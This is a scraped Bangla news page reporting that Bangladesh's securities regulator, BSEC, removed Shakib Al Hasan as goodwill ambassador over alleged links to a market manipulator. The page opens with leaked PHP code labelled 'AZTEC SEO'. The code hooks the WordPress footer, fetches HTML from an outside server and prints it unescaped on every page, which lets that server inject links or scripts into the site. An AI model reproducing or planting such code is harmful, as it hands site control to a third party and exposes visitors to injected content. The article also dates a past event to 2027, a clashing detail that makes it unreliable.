/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সাকিবকে শুভেচ্ছাদূত থেকে বাদ দিল বিএসইসি | Dhaka Sky News

কুমিল্লায় বন্যা পরিস্থিতির উন্নতি

আগের সংবাদ

শিশু বিলম্বে কথা বলার কারণ ও প্রতিকার

পরের সংবাদ

সাকিবকে শুভেচ্ছাদূত থেকে বাদ দিল বিএসইসি

ঢাকা স্কাইনিউজ রিপোর্ট

প্রকাশিত: August 29, 2024 , 1:17 pm

ক্রিকেট তারকা অলরাউন্ডার সাকিব আল হাসানকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিল পুঁজিবাজার নিয়ন্ত্রক সংস্থা বাংলাদেশ সিকিউরিটিজ অ্যান্ড এক্সচেঞ্জ কমিশন (বিএসইসি)। সাকিবের ওপর বেশ কিছু অভিযোগ ওঠায় তাকে নিজেদের শুভেচ্ছাদূত থেকে বাদ দিয়েছে বিএসইসি।

বুধবার ২৯ আগস্ট ২০২৪ বিএসইসির কমিশন সভায় এ সিদ্ধান্ত নেওয়া হয়। বিএসইসি সূত্র জানিয়েছে, বাংলাদেশ জাতীয় ক্রিকেট দলের অলরাউন্ডার সাকিব আল হাসান ছিলেন বিএসইসির ‘দেশব্যাপী বিনিয়োগ শিক্ষা কার্যক্রমের’ শুভেচ্ছাদূত। ২০১৭ সালে সাকিব আল হাসানকে এ কার্যক্রমের সঙ্গে যুক্ত করে বিএসইসি।

গত ২০২৭ সালের অক্টোবরে রাজধানীর শিল্পকলা একাডেমিতে আয়োজিত বিশ্ব বিনিয়োগকারী সপ্তাহের উদ্বোধনী অনুষ্ঠানে সাকিবকে শুভেচ্ছাদূত হিসেবে ঘোষণা করে বিএসইসি। ওই সময় বিএসইসির চেয়ারম্যানের দায়িত্বে ছিলেন এম খায়রুল হোসেন।

বিএসইসির ২০২০ সালে অধ্যাপক শিবলী রুবাইয়াত–উল–ইসলাম বিএসইসির নতুন চেয়ারম্যান হলেও শুভেচ্ছাদূত হিসেবে বহাল রাখা হয় সাকিবকে। এ সময় পুঁজিবাজারের একজন আলোচিত বিনিয়োগকারী হিসেবেও আত্মপ্রকাশ ঘটে সাকিব আল হাসানের।

জানা যায়, পুঁজিবাজারের আলোচিত কারসাজিকারক আবুল খায়ের হিরুর সঙ্গে মিলে পুঁজিবাজারের বড় বিনিয়োগকারী হয়ে যান সাকিব। গত চার থেকে পাঁচ বছরে পুঁজিবাজারে যেসব শেয়ার নিয়ে আবুল খায়ের হিরু সবচেয়ে বেশি কারসাজির ঘটনা ঘটিয়েছেন, এসব কোম্পানির শেয়ারে সাকিবেরও বিনিয়োগ ছিল।